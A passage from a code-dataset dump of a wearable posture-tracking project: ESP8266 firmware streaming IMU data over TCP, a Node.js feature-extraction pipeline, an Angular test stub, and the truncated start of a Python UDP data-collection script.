Serial.println(F(\"bno not detected on default port\"));\n if (!bno.begin(SDA_AUX, SCL_AUX)) {\n Serial.println(F(\"bno not detected on aux port\"));\n while(1);\n }\n } else {\n Serial.println(F(\"bno detected!\"));\n }\n displaySensorDetails(bno);\n displaySensorDetails(bno);\n displayCalStatus(bno);\n bno.setExtCrystalUse(true);\n timer_100Hz= new TimerObject(INTERVAL_100HZ);\n timer_100Hz -> setOnTimer(&readSensor100Hz);\n timer_20Hz= new TimerObject(INTERVAL_20HZ);\n timer_20Hz -> setOnTimer(&readSensor20Hz);\n if (!client.connect(host, PORT)) {\n Serial.println(F(\"Connection to dataServer failed!\"));\n }\n delay(TCP_CONNECT_FREEZE_MAX / 1000);\n timer_100Hz -> Start();\n timer_20Hz -> Start();\n *clientBaseTimeStamp_p = (uint64_t) micros();\n *clientReceiveTimeStamp_p = *clientBaseTimeStamp_p;\n}\n\nvoid loop() {\n ArduinoOTA.handle();\n if (! mySetup_finished) {\n mySetup();\n mySetup_finished = true;\n } else {\n timer_100Hz -> Update();\n timer_20Hz -> Update();\n\n if (micros() - tcpLastConnectTimestamp < tcpReconnectWaitTime) {\n return;\n }\n if (dead) {\n if (micros() - deadTime < TCP_CONNECT_FREEZE_MAX) {\n startWIFI();\n *clientReceiveTimeStamp_p = (uint64_t) micros();\n dead = false;\n } else {\n return;\n }\n }\n\n if (client.connected()) {\n uint32_t receiveLen = client.available();\n if (receiveLen) {\n *clientReceiveTimeStamp_p = (uint64_t) micros();\n\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n while (client.read((uint8_t *) serverTimeStamp_p, RECEIVE_BUFFER_SIZE) > 0);\n\n *((uint32_t*)&payloadCursor_p[0])= 0xFFFFFFFF;\n *((uint32_t*)&payloadCursor_p[1])= 0xFFFFFFFF;\n uint32_t payloadBufLen = payloadCursor_p - payloadCursor_origin;\n uint64_t sendTimeStamp = (uint64_t) micros();\n *clientSendTimeStamp_p = sendTimeStamp;\n\n client.write((uint8_t*)payloadBuf, payloadBufLen * 4 + 48);\n\n client.flush();\n *clientBaseTimeStamp_p = (uint64_t) micros();\n payloadCursor_p = payloadCursor_origin;\n tcpReconnectWaitTime = 0;\n dead = false;\n deadTime = 0;\n }\n } else {\n Serial.print((int) system_get_free_heap_size());\n Serial.println(F(\"Reconnect TCP!\"));\n client = WiFiClient();\n if (!client.connect(host, PORT)) {\n dead = true;\n Serial.println(F(\"Connection to dataServer failed!\"));\n } else {\n tcpLastConnectTimestamp = (uint64_t) micros();\n *clientReceiveTimeStamp_p = tcpLastConnectTimestamp;\n tcpReconnectWaitTime = random(TCP_CONNECT_FREEZE_MIN, TCP_CONNECT_FREEZE_MAX);\n }\n }\n\n if ((micros() - *clientReceiveTimeStamp_p) > LOST_SERVER_TIME) {\n Serial.print((int) system_get_free_heap_size());\n Serial.println(F(\"Reconnect TCP!\"));\n client.stop();\n *clientReceiveTimeStamp_p = (uint64_t) micros();\n client = WiFiClient();\n if (!client.connect(host, PORT)) {\n dead = true;\n Serial.println(F(\"Connection to dataServer failed!\"));\n } else {\n tcpLastConnectTimestamp = (uint64_t) micros();\n *clientReceiveTimeStamp_p = tcpLastConnectTimestamp;\n tcpReconnectWaitTime = random(TCP_CONNECT_FREEZE_MIN, TCP_CONNECT_FREEZE_MAX);\n }\n }\n\n if (dead) {\n client.stop();\n WiFi.disconnect();\n WiFi.mode(WIFI_OFF);\n Serial.println(F(\"Reconnect WIFI!\"));\n deadTime = (uint64_t) micros();\n }\n }\n}\n\nvoid clearBuffer() {\n Serial.println(F(\"clear Buffer called\"));\n memset(payloadCursor_origin, 0, PAYLOAD_BUFFER_SIZE - 40);\n payloadCursor_p = payloadCursor_origin;\n *clientBaseTimeStamp_p = (uint64_t) micros();\n}\n\n\nvoid displaySensorDetails(Adafruit_BNO055 bno) {\n sensor_t sensor;\n bno.getSensor(&sensor);\n Serial.print(F(\"Sensor: \"));\n Serial.print(sensor.name);\n Serial.print(F(\"vDriver: \"));\n Serial.print(sensor.version);\n Serial.print(F(\"UID: \"));\n Serial.print(sensor.sensor_id);\n delay(100);\n}\n\nvoid displaySensorStatus(Adafruit_BNO055 bno) {\n uint8_t system_status, self_test_results, system_error;\n system_status = self_test_results = system_error = 0;\n bno.getSystemStatus(&system_status, &self_test_results, &system_error);\n Serial.print(F(\"SysStat: \"));\n Serial.print(system_status);\n Serial.print(F(\"SelfTest: \"));\n Serial.print(self_test_results);\n Serial.print(F(\"SysErr: \"));\n Serial.println(system_error);\n delay(100);\n}\n\nvoid displayCalStatus(Adafruit_BNO055 bno) {\n uint8_t bno_system, bno_gyro, bno_accel, bno_mag;\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n while(bno_system != 3) {\n ArduinoOTA.handle();\n cal_counter++;\n if (cal_counter == CAL_BLINK_COUNT) {\n cal_counter = 0;\n led_val ^= 1;\n digitalWrite(BOARD_LED, led_val);\n // Serial.println(\"blink\");\n }\n bno.getCalibration(&bno_system, &bno_gyro, &bno_accel, &bno_mag);\n Serial.print(F(\"System: \"));\n Serial.print(bno_system);\n Serial.print(F(\"gyro: \"));\n Serial.print(bno_gyro);\n Serial.print(F(\"accel: \"));\n Serial.print(bno_accel);\n Serial.print(F(\"mag: \"));\n Serial.println(bno_mag);\n delay(BNO055_CAL_DELAY_MS);\n }\n led_val = 0;\n digitalWrite(BOARD_LED, led_val);\n}\n\n"
},
{
"alpha_fraction": 0.606242835521698,
"alphanum_fraction": 0.6183210015296936,
"avg_line_length": 41,
"blob_id": "5cdb22007d8f02f95664e880d33edb51e11960c0",
"content_id": "e9c4e5c442c40a8887c76b3be467fa35b1e735e8",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 20119,
"license_type": "no_license",
"max_line_length": 237,
"num_lines": 479,
"path": "/oriTrakHAR-master/dataProcessing/extractFeature.js",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "const Promise = require('bluebird')\nconst db = require('sqlite')\nconst config = require('./config')\nconst fs = require('fs')\nconst csv = require('csv-stream')\nconst cluster = require('cluster')\nconst Jstat = require('jStat')\nconst Ra4Fft = require('fft.js')\nconst fftUtil = require('fft-js').util\nconst numCPUs = require('os').cpus().length\n// const numCPUs = 2\n\n// var preprocessedDataDb\n\nif (cluster.isMaster) {\n masterProcess()\n} else {\n childProcess()\n}\n\nfunction childProcess() {\n var preprocessedDataDb\n function handleMasterMsg(msg) {\n console.log(`Worker receive master msg: ${JSON.stringify(msg)}`)\n switch (msg.event) {\n case 'job':\n processData(msg.jobNum)\n break\n case 'fin':\n process.exit()\n break\n }\n }\n var execQueue = dbConnect()\n .then(db => {\n preprocessedDataDb = db\n process.on('message', handleMasterMsg)\n\n })\n .then(() => {\n console.log(`process ${process.pid} connected!`)\n process.send({event:'ready', id:process.pid})\n })\n\n function generateHist(yaw1, yaw2, pitch1, pitch2, roll1, roll2) {\n return Array((yaw2 - yaw1) / config.HIST_BIN_SIZE * (pitch2 - pitch1) / config.HIST_BIN_SIZE * (roll2 - roll1) / config.HIST_BIN_SIZE).fill(0)\n }\n\n function clamp(num, min, max) {\n if (num < min) {\n num = min\n } else if (num > max) {\n num = max\n }\n return num\n }\n\n function processHistGen(yaw1, yaw2, pitch1, pitch2, roll1, roll2) {\n var histArray = generateHist(yaw1, yaw2, pitch1, pitch2, roll1, roll2)\n return function processHist(histDataRows) {\n histDataRows.forEach(row => {\n // console.log(`${JSON.stringify(row)} ${(row.yaw_floor - yaw1) / config.HIST_BIN_SIZE} ${(row.pitch_floor - pitch1) / config.HIST_BIN_SIZE} ${(row.roll_floor - roll1) / config.HIST_BIN_SIZE}`)\n if (row.yaw_floor === null) {\n return\n }\n var yaw = clamp((row.yaw_floor - yaw1) / config.HIST_BIN_SIZE, 0, (yaw2 - yaw1) / config.HIST_BIN_SIZE)\n var pitch = clamp((row.pitch_floor - pitch1) / config.HIST_BIN_SIZE, 0, (pitch2 - pitch1) / config.HIST_BIN_SIZE)\n var roll = clamp((row.roll_floor - roll1) / config.HIST_BIN_SIZE, 0, (roll2 - roll1) / config.HIST_BIN_SIZE)\n histArray[yaw * pitch * roll + pitch * roll + roll] = row.count\n })\n var totalCount = Jstat.sum(histArray)\n if (totalCount > (config.FEATURE_LENGTH / 10000 * 0.85)) {\n // console.log(` sum: ${totalCount}`)\n return histArray.map(d => d/totalCount)\n } else {\n return null\n }\n }\n }\n function processData(jobNum) {\n console.log(`${process.pid} on job ${jobNum}`)\n function getFFTPhasors (input) {\n const f = new Ra4Fft(config.WINDOW_SIZE)\n const out = f.createComplexArray()\n f.realTransform(out, input)\n f.completeSpectrum(out)\n var phasors = []\n out.forEach((element, ndx) => {\n var i = Math.floor(ndx / 2)\n var isOdd = ndx % 2\n if (!isOdd) {\n phasors.push([element])\n } else {\n phasors[i].push(element)\n }\n })\n return phasors\n }\n\n function getKeyFreqMag (phasors, SAMPLE_RATE, id) {\n // var sensor1Frequencies = fftUtil.fftFreq(phasors, config.SAMPLE_RATE)\n // console.log(sensor1Frequencies.length)\n var magnitudes = fftUtil.fftMag(phasors)\n var combined = []\n // console.log(magnitudes)\n for (var i = 0; i < magnitudes.length / 2; i += 8) {\n // console.log(Jstat.sum(magnitudes.slice(i, i+8)))\n combined.push(Jstat.sum(magnitudes.slice(i, i+8)))\n }\n // console.log(`combined: ${JSON.stringify(combined)}`)\n return combined\n }\n\n\n var rawDataProcess = preprocessedDataDb.all(getRawDataQuery(jobNum))\n .then(data => {\n if (data.length <= (config.FEATURE_LENGTH / 10000 * 0.85)) {\n return null\n }\n torso_gyro_x = data.map(d => d.torso_gyro_x).filter(d => d !== null)\n torso_gyro_y = data.map(d => d.torso_gyro_y).filter(d => d !== null)\n torso_gyro_z = data.map(d => d.torso_gyro_z).filter(d => d !== null)\n torso_acc_x = data.map(d => d.torso_acc_x).filter(d => d !== null)\n torso_acc_y = data.map(d => d.torso_acc_y).filter(d => d !== null)\n torso_acc_z = data.map(d => d.torso_acc_z).filter(d => d !== null)\n torso_acc_mag = data.map(d => d.torso_acc_mag).filter(d => d !== null)\n torso_gyro_mag = data.map(d => d.torso_gyro_mag).filter(d => d !== null)\n head_gyro_x = data.map(d => d.head_gyro_x).filter(d => d !== null)\n head_gyro_y = data.map(d => d.head_gyro_y).filter(d => d !== null)\n head_gyro_z = data.map(d => d.head_gyro_z).filter(d => d !== null)\n head_acc_x = data.map(d => d.head_acc_x).filter(d => d !== null)\n head_acc_y = data.map(d => d.head_acc_y).filter(d => d !== null)\n head_acc_z = data.map(d => d.head_acc_z).filter(d => d !== null)\n head_acc_mag = data.map(d => d.head_acc_mag).filter(d => d !== null)\n head_gyro_mag = data.map(d => d.head_gyro_mag).filter(d => d !== null)\n left_gyro_x = data.map(d => d.left_gyro_x).filter(d => d !== null)\n left_gyro_y = data.map(d => d.left_gyro_y).filter(d => d !== null)\n left_gyro_z = data.map(d => d.left_gyro_z).filter(d => d !== null)\n left_acc_x = data.map(d => d.left_acc_x).filter(d => d !== null)\n left_acc_y = data.map(d => d.left_acc_y).filter(d => d !== null)\n left_acc_z = data.map(d => d.left_acc_z).filter(d => d !== null)\n left_acc_mag = data.map(d => d.left_acc_mag).filter(d => d !== null)\n left_gyro_mag = data.map(d => d.left_gyro_mag).filter(d => d !== null)\n right_gyro_x = data.map(d => d.right_gyro_x).filter(d => d !== null)\n right_gyro_y = data.map(d => d.right_gyro_y).filter(d => d !== null)\n right_gyro_z = data.map(d => d.right_gyro_z).filter(d => d !== null)\n right_acc_x = data.map(d => d.right_acc_x).filter(d => d !== null)\n right_acc_y = data.map(d => d.right_acc_y).filter(d => d !== null)\n right_acc_z = data.map(d => d.right_acc_z).filter(d => d !== null)\n right_acc_mag = data.map(d => d.right_acc_mag).filter(d => d !== null)\n right_gyro_mag = data.map(d => d.right_gyro_mag).filter(d => d !== null)\n\n var mean = [\n Jstat.mean(torso_gyro_x),\n Jstat.mean(torso_gyro_y),\n Jstat.mean(torso_gyro_z),\n Jstat.mean(torso_acc_x),\n Jstat.mean(torso_acc_y),\n Jstat.mean(torso_acc_z),\n Jstat.mean(torso_acc_mag),\n Jstat.mean(torso_gyro_mag),\n Jstat.mean(head_gyro_x),\n Jstat.mean(head_gyro_y),\n Jstat.mean(head_gyro_z),\n Jstat.mean(head_acc_x),\n Jstat.mean(head_acc_y),\n Jstat.mean(head_acc_z),\n Jstat.mean(head_acc_mag),\n Jstat.mean(head_gyro_mag),\n Jstat.mean(left_gyro_x),\n Jstat.mean(left_gyro_y),\n Jstat.mean(left_gyro_z),\n Jstat.mean(left_acc_x),\n Jstat.mean(left_acc_y),\n Jstat.mean(left_acc_z),\n Jstat.mean(left_acc_mag),\n Jstat.mean(left_gyro_mag),\n Jstat.mean(right_gyro_x),\n Jstat.mean(right_gyro_y),\n Jstat.mean(right_gyro_z),\n Jstat.mean(right_acc_x),\n Jstat.mean(right_acc_y),\n Jstat.mean(right_acc_z),\n Jstat.mean(right_acc_mag),\n Jstat.mean(right_gyro_mag)\n ]\n var variance = [\n Jstat.variance(torso_gyro_x),\n Jstat.variance(torso_gyro_y),\n Jstat.variance(torso_gyro_z),\n Jstat.variance(torso_acc_x),\n Jstat.variance(torso_acc_y),\n Jstat.variance(torso_acc_z),\n Jstat.variance(torso_acc_mag),\n Jstat.variance(torso_gyro_mag),\n Jstat.variance(head_gyro_x),\n Jstat.variance(head_gyro_y),\n Jstat.variance(head_gyro_z),\n Jstat.variance(head_acc_x),\n Jstat.variance(head_acc_y),\n Jstat.variance(head_acc_z),\n Jstat.variance(head_acc_mag),\n Jstat.variance(head_gyro_mag),\n Jstat.variance(left_gyro_x),\n Jstat.variance(left_gyro_y),\n Jstat.variance(left_gyro_z),\n Jstat.variance(left_acc_x),\n Jstat.variance(left_acc_y),\n Jstat.variance(left_acc_z),\n Jstat.variance(left_acc_mag),\n Jstat.variance(left_gyro_mag),\n Jstat.variance(right_gyro_x),\n Jstat.variance(right_gyro_y),\n Jstat.variance(right_gyro_z),\n Jstat.variance(right_acc_x),\n Jstat.variance(right_acc_y),\n Jstat.variance(right_acc_z),\n Jstat.variance(right_acc_mag),\n Jstat.variance(right_gyro_mag)\n ]\n var median = [\n Jstat.median(torso_gyro_x),\n Jstat.median(torso_gyro_y),\n Jstat.median(torso_gyro_z),\n Jstat.median(torso_acc_x),\n Jstat.median(torso_acc_y),\n Jstat.median(torso_acc_z),\n Jstat.median(torso_acc_mag),\n Jstat.median(torso_gyro_mag),\n Jstat.median(head_gyro_x),\n Jstat.median(head_gyro_y),\n Jstat.median(head_gyro_z),\n Jstat.median(head_acc_x),\n Jstat.median(head_acc_y),\n Jstat.median(head_acc_z),\n Jstat.median(head_acc_mag),\n Jstat.median(head_gyro_mag),\n Jstat.median(left_gyro_x),\n Jstat.median(left_gyro_y),\n Jstat.median(left_gyro_z),\n Jstat.median(left_acc_x),\n Jstat.median(left_acc_y),\n Jstat.median(left_acc_z),\n Jstat.median(left_acc_mag),\n Jstat.median(left_gyro_mag),\n Jstat.median(right_gyro_x),\n Jstat.median(right_gyro_y),\n Jstat.median(right_gyro_z),\n Jstat.median(right_acc_x),\n Jstat.median(right_acc_y),\n Jstat.median(right_acc_z),\n Jstat.median(right_acc_mag),\n Jstat.median(right_gyro_mag)\n ]\n\n\n torso_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_gyro_y_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_x_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_y_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_z_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(torso_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n torso_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(torso_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_y_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_x_FFT = getKeyFreqMag(getFFTPhasors(head_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_y_FFT = getKeyFreqMag(getFFTPhasors(head_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_z_FFT = getKeyFreqMag(getFFTPhasors(head_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(head_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n head_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(head_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(left_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_y_FFT = getKeyFreqMag(getFFTPhasors(left_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(left_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_x_FFT = getKeyFreqMag(getFFTPhasors(left_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_y_FFT = getKeyFreqMag(getFFTPhasors(left_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_z_FFT = getKeyFreqMag(getFFTPhasors(left_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(left_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n left_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(left_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_x_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_y_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_z_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_x_FFT = getKeyFreqMag(getFFTPhasors(right_acc_x.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_y_FFT = getKeyFreqMag(getFFTPhasors(right_acc_y.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_z_FFT = getKeyFreqMag(getFFTPhasors(right_acc_z.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_acc_mag_FFT = getKeyFreqMag(getFFTPhasors(right_acc_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n right_gyro_mag_FFT = getKeyFreqMag(getFFTPhasors(right_gyro_mag.slice(0, config.WINDOW_SIZE)), config.SAMPLE_RATE)\n\n\n var features = mean.concat(variance, median,\n torso_gyro_x_FFT,\n torso_gyro_y_FFT,\n torso_gyro_z_FFT,\n torso_acc_x_FFT,\n torso_acc_y_FFT,\n torso_acc_z_FFT,\n torso_acc_mag_FFT,\n torso_gyro_mag_FFT,\n head_gyro_x_FFT,\n head_gyro_y_FFT,\n head_gyro_z_FFT,\n head_acc_x_FFT,\n head_acc_y_FFT,\n head_acc_z_FFT,\n head_acc_mag_FFT,\n head_gyro_mag_FFT,\n left_gyro_x_FFT,\n left_gyro_y_FFT,\n left_gyro_z_FFT,\n left_acc_x_FFT,\n left_acc_y_FFT,\n left_acc_z_FFT,\n left_acc_mag_FFT,\n left_gyro_mag_FFT,\n right_gyro_x_FFT,\n right_gyro_y_FFT,\n right_gyro_z_FFT,\n right_acc_x_FFT,\n right_acc_y_FFT,\n right_acc_z_FFT,\n right_acc_mag_FFT,\n right_gyro_mag_FFT\n )\n\n // var phasors = getFFTPhasors(torso_gyro_x.slice(0, config.WINDOW_SIZE))\n // var fftMag = getKeyFreqMag(phasors, this.SAMPLE_RATE)\n // console.log(`fftMag: ${JSON.stringify(fftMag)}`)\n // console.log(features)\n // console.log(features.length)\n\n return features\n })\n\n var torsoHist = preprocessedDataDb.all(`\n SELECT\n round(torso_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(torso_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(torso_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-180, 180, -90, 90, -180, 180))\n\n var headRelativeHist = preprocessedDataDb.all(`\n SELECT\n round(head_relative_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(head_relative_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(head_relative_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH} AND head_relative_yaw <= 90 AND head_relative_yaw >= -90 AND head_relative_roll < 45 AND head_relative_roll >= -45\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-90, 90, -90, 90, -45, 45))\n\n var leftRelativeHist = preprocessedDataDb.all(`\n SELECT\n round(left_relative_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(left_relative_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(left_relative_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-180, 180, -90, 90, -180, 180))\n\n var rightRelativeHist = preprocessedDataDb.all(`\n SELECT\n round(right_relative_yaw/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS yaw_floor,\n round(right_relative_pitch/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS pitch_floor,\n round(right_relative_roll/${config.HIST_BIN_SIZE} - 0.5)*${config.HIST_BIN_SIZE} AS roll_floor,\n count(*) AS count\n FROM Preprocessed100HZData\n WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}\n GROUP BY 1, 2, 3\n ORDER BY 1, 2, 3`)\n .then(processHistGen(-180, 180, -90, 90, -180, 180))\n var features = []\n var hasNull = false\n Promise.map([[jobNum], rawDataProcess, torsoHist, headRelativeHist, leftRelativeHist, rightRelativeHist], feat => {\n if (feat === null) {\n hasNull = true\n }\n if (!hasNull) {\n features = features.concat(feat)\n }\n })\n .then(() => {\n if (hasNull) {\n process.send({'event': 'ready', id: process.pid})\n } else {\n process.send({'event': 'newRow', id: process.pid, feature: features})\n }\n })\n }\n function getRawDataQuery(jobNum) {\n return `SELECT * FROM Preprocessed100HZData WHERE interpolated_fixed_rate_time >= ${jobNum} AND interpolated_fixed_rate_time < ${jobNum + config.FEATURE_LENGTH}`\n }\n}\n\nfunction masterProcess () {\n console.log(`Master ${process.pid} is running`)\n var wstream = fs.createWriteStream(config.FEATURE_OUTPUT);\n var preprocessedDataDb\n var startTime\n var endTime\n var iterator\n var workers = {}\n function handleWorkerMsg(msg) {\n console.log(`master receive worker msg: ${JSON.stringify(msg.event)}`)\n switch (msg.event) {\n case 'newRow':\n wstream.write(`${msg.feature.join(',')}\\n`)\n case 'ready':\n var jobNum = iterator.next()\n if (jobNum) {\n workers[msg.id].send({event: 'job', jobNum: jobNum})\n } else {\n workers[msg.id].send({event: 'fin'})\n delete workers[msg.id]\n if (Object.keys(workers).length === 0) {\n wstream.end()\n }\n }\n break\n\n }\n }\n dbConnect()\n .then(db => {\n preprocessedDataDb = db\n })\n .then(() => {\n return preprocessedDataDb.all(`SELECT MIN(interpolated_fixed_rate_time) FROM Preprocessed100HZData`)\n })\n .then(minTimestamp => {\n startTime = minTimestamp[0]['MIN(interpolated_fixed_rate_time)']\n return preprocessedDataDb.all(`SELECT MAX(interpolated_fixed_rate_time) FROM Preprocessed100HZData`)\n })\n .then(maxTimestamp => {\n endTime = maxTimestamp[0]['MAX(interpolated_fixed_rate_time)']\n console.log(startTime)\n console.log(endTime)\n iterator = new Iterator(startTime, endTime, config.FEATURE_LENGTH / 2)\n for (let i = 1; i < numCPUs; i++) {\n console.log(`Forking process number ${i}...`)\n var worker = cluster.fork()\n workers[worker.process.pid] = worker\n worker.on('message', handleWorkerMsg)\n }\n })\n\n function Iterator(min, max, step) {\n this.min = min - step\n this.max = max\n this.step = step\n this.cur = this.min\n this.next = function() {\n var ans\n this.cur += this.step\n if (this.cur <= this.max) {\n ans = this.cur\n } else {\n ans = null\n }\n return ans\n }\n }\n}\n\n\n\nfunction dbConnect() {\n return db.open(config.PROCESSED_DATA_PATH, {Promise})\n}\n\n"
},
{
"alpha_fraction": 0.6800000071525574,
"alphanum_fraction": 0.6800000071525574,
"avg_line_length": 25,
"blob_id": "30e05f63e00745f0318db964ef70d7804d00a70d",
"content_id": "942575b7676d9c0e4d9e8f17d36ccfb6f63c2017",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "TypeScript",
"length_bytes": 650,
"license_type": "no_license",
"max_line_length": 73,
"num_lines": 25,
"path": "/oriTrakHAR-master/rawDataVis/src/app/components/middle-map/middle-map.component.spec.ts",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import { async, ComponentFixture, TestBed } from '@angular/core/testing';\n\nimport { MiddleMapComponent } from './middle-map.component';\n\ndescribe('MiddleMapComponent', () => {\n let component: MiddleMapComponent;\n let fixture: ComponentFixture<MiddleMapComponent>;\n\n beforeEach(async(() => {\n TestBed.configureTestingModule({\n declarations: [ MiddleMapComponent ]\n })\n .compileComponents();\n }));\n\n beforeEach(() => {\n fixture = TestBed.createComponent(MiddleMapComponent);\n component = fixture.componentInstance;\n fixture.detectChanges();\n });\n\n it('should create', () => {\n expect(component).toBeTruthy();\n });\n});\n"
},
{
"alpha_fraction": 0.5410000085830688,
"alphanum_fraction": 0.5835000276565552,
"avg_line_length": 27.571428298950195,
"blob_id": "82e0ee3c956019a058266e81708d2f38b6f4a6c5",
"content_id": "1d17142e449e66b30a24d2bd7112dec225ed00d4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2000,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 70,
"path": "/data_collection.py",
"repo_name": "JW2473/Posture-Reconstruction",
"src_encoding": "UTF-8",
"text": "import socket\nimport subprocess\nimport threading\nfrom datetime import datetime\n'''\nUDP_IP = \"192.168.4.3\"\nUDP_PORT = 8080\nMESSAGE = \"Hello, World\"\n\nsock1 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock2 = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock2.bind((\"192.168.4.4\", 8080))\n'''\nIPs = []\nfiles = []\npipe = subprocess.Popen(\"arp -a|grep ESP\", shell=True, stdout=subprocess.PIPE)\ntext = pipe.stdout.read().decode(\"utf-8\")\n\n\nclass Receiver(threading.Thread):\n def run(self, UDP_IP, UDP_PORT, f):\n while True:\n sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n sock.bind((UDP_IP, UDP_PORT))\n data, addr = sock.recvfrom(1024)\n f.write(data)\n \n\nlines = text.split('\\n') ;\nfor line in lines:\n if len(line) > 0:\n l = line.split(' ')\n #name = l[0].decode(\"unicode-escape\")\n ip = l[1].encode('ascii', 'ignore')[1:-1]\n if True:\n IPs.append(ip)\n\nFiles = [None for i in range(0, len(IPs))]\nPorts = [None for i in range(0, len(IPs))]\n\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nsock.bind((\"192.168.4.1\", 8080))\nprint(IPs)\n\nchannels = []\nwhile n < len(IPs):\n data, addr = sock.recvfrom(1024);\n if addr[0] in IPs:\n channel 